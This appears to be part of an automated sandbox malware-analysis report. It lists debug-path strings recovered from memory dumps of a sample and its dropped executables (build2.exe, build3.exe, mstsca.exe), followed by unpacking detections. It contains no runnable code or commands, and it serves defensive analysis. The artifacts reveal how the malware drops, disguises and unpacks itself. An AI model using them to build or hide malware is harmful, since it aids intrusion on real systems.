Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*\a source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\5 source: sIQywRNC5M.exe, 00000005.00000003.2193004950.0000000003232000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\Pack4 source: sIQywRNC5M.exe, 00000005.00000003.2444852723.0000000003294000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465758422.0000000003293000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444156089.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\# source: sIQywRNC5M.exe, 00000005.00000003.2490137312.000000000323F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\@ source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000002.2110659562.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.2108532152.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000009.00000000.2109798030.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: sIQywRNC5M.exe, 00000005.00000003.2334966830.0000000003232000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2193004950.0000000003232000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\W$P source: sIQywRNC5M.exe, 00000005.00000003.2511312512.000000000366E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2504498896.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2511539947.00000000036E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*ory\\u source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\254\ source: sIQywRNC5M.exe, 00000005.00000003.2511312512.000000000366E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2503888250.000000000365C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\xinasu.pdb source: sIQywRNC5M.exe
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\p\M source: sIQywRNC5M.exe, 00000005.00000003.2505482464.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2506093082.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2498067515.0000000003247000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497793013.0000000003224000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2500034757.0000000003257000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\\ source: sIQywRNC5M.exe, 00000005.00000003.2148161222.000000000313F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335172092.000000000313C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2148117977.000000000312B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2150305604.000000000312B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\352\:\U source: sIQywRNC5M.exe, 00000005.00000003.2518500164.0000000003644000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\bwe\ source: sIQywRNC5M.exe, 00000005.00000003.2518500164.0000000003644000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\tore\ source: sIQywRNC5M.exe, 00000005.00000003.2148161222.000000000313F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335172092.000000000313C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2148117977.000000000312B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2150305604.000000000312B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\c source: sIQywRNC5M.exe, 00000005.00000003.2408275863.0000000003213000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: sIQywRNC5M.exe, sIQywRNC5M.exe, 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000006.00000002.2072698379.0000000005E90000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000015.00000002.2542986174.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000018.00000002.2705389001.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\g source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Edge\*qU source: sIQywRNC5M.exe, 00000005.00000003.2490137312.000000000323F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errore\AppCache133584364071005184.txttxtw source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\m source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sIQywRNC5M.exe, 00000005.00000003.2123092523.0000000009A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\5 source: sIQywRNC5M.exe, 00000005.00000003.2515773524.0000000003336000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\x source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: sIQywRNC5M.exe, 00000000.00000002.2030033825.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000001.00000002.2046900004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000004.00000002.2052330651.0000000005D80000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000006.00000002.2072698379.0000000005E90000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000015.00000002.2542986174.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000018.00000002.2705389001.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2518287283.0000000003721000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2432204625.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2407447439.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433719950.00000000033EF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\=V source: sIQywRNC5M.exe, 00000005.00000003.2466724530.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2490137312.0000000003293000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465758422.0000000003293000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2466477187.000000000329D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2492858422.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2491259032.00000000032B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\o source: sIQywRNC5M.exe, 00000005.00000003.2466357017.000000000323F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444002451.0000000003231000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2466244705.000000000323B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465758422.0000000003211000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\^ source: sIQywRNC5M.exe, 00000005.00000003.2493869786.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2491140733.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465915894.00000000033DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\** source: sIQywRNC5M.exe, 00000005.00000003.2334881246.000000000314C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335203038.0000000003159000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335065759.0000000003155000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2335294991.0000000003162000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\** source: sIQywRNC5M.exe, 00000005.00000003.2433288502.000000000314F000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433824342.0000000003177000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433171599.0000000003144000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2432766191.0000000003134000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433329936.000000000316D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000002.2228877025.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000B.00000000.2132609845.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000D.00000000.2227791961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000010.00000000.2233339702.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000010.00000002.2309193789.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000011.00000000.2308477250.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000017.00000002.2728791100.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000017.00000000.2650842338.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001A.00000000.2727770543.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001B.00000000.3241957172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001B.00000002.3340913920.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000000.3340031319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000002.3965266280.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000000.3841712597.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000000.3962943920.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000000.4442019681.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000002.4493003377.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2490315317.0000000003683000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497603843.000000000362C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2499800484.000000000365E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2505482464.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2506093082.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2498067515.0000000003247000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2498904016.000000000317B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2499420917.0000000003182000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497793013.0000000003224000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2500034757.0000000003257000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: sIQywRNC5M.exe, 00000005.00000003.2335172092.000000000313C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbchCache\AppCache133584364071005184.txta source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: sIQywRNC5M.exe, 00000005.00000003.2335172092.000000000313C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\Q0v source: sIQywRNC5M.exe, 00000005.00000003.2504227018.00000000035D5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2503888250.0000000003584000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\{q* source: sIQywRNC5M.exe, 00000005.00000003.2490137312.000000000323F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: sIQywRNC5M.exe, 00000005.00000003.2527809426.00000000035A4000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2542393895.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2533728705.00000000035B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vGC:\xinasu.pdb source: sIQywRNC5M.exe
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2490315317.0000000003683000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2497603843.000000000362C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2499800484.000000000365E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ppli source: sIQywRNC5M.exe, 00000005.00000003.2510157688.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\bx\ source: sIQywRNC5M.exe, 00000005.00000003.2443737291.000000000359D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2445067398.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444886126.00000000035A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: sIQywRNC5M.exe, 00000005.00000003.2443737291.000000000359D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2445067398.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465585747.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2444886126.00000000035A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\972\ source: sIQywRNC5M.exe, 00000005.00000003.2518287283.0000000003721000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: sIQywRNC5M.exe, 00000005.00000003.2433909081.0000000003234000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433225403.0000000003231000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\U source: sIQywRNC5M.exe, 00000005.00000003.2443409930.0000000003198000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433429319.000000000319D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2432422096.0000000003198000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2445196305.0000000003198000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzq source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2445067398.00000000035EC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465585747.00000000035B5000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Unpacked PE file: 1.2.sIQywRNC5M.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Unpacked PE file: 5.2.sIQywRNC5M.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Unpacked PE file: 7.2.sIQywRNC5M.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Unpacked PE file: 9.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Unpacked PE file: 13.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 17.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Unpacked PE file: 22.2.sIQywRNC5M.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Unpacked PE file: 25.2.sIQywRNC5M.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 26.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
